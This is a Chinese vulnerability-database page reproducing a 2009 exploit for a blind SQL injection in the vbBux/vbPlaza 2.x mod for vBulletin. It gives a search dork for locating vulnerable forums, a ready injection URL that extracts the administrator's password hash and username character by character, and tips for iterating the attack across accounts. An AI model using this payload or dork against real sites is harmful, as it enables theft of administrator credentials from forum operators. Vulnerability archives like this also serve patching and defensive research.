vBulletin vbBux/vbPlaza 2.x - 'vbplaza.php' Blind SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057844 漏洞类型
发布时间 2009-05-26 更新时间 2009-05-26
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/8784
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
--==+======================================================================================================================+==--
--==+                  vBulletin vbBux/vbPlaza <= 2.x (vbplaza.php) Remote Blind SQL Injection Vulnerability                +==--
--==+======================================================================================================================+==--

AUTHOR: Cold z3ro & Crck_Man
SITE: www.vbPlaza.com
DORK: inurl:"vbplaza.php?do=*"

DESCRIPTION: Blind SQL Injection in name of vbplaza.php a mod for vBulletin, able to retrieve admin hash

EXPLOIT: 
http://www.site.com/forum/vbplaza.php?do=item&name=bank'/**/and 58<ascii(substring((SELECT concat(password,0x3a,username) from user limit 0,1),33,1))/*

IE: ascii encodes
	58  => :
	48  => 0
	120 => x

NOTE: You'll need to be logged into the forum to exploit vbplaza.php. Increment the limit to get the next admin .


Copyrights : www.hackteach.org , www.h-t.cc

Greetz : www.hackteach.[org/net] , www.islam-attack.com , www.s3curi7y.com , www.xp10.biz , Friends 

# milw0rm.com [2009-05-26]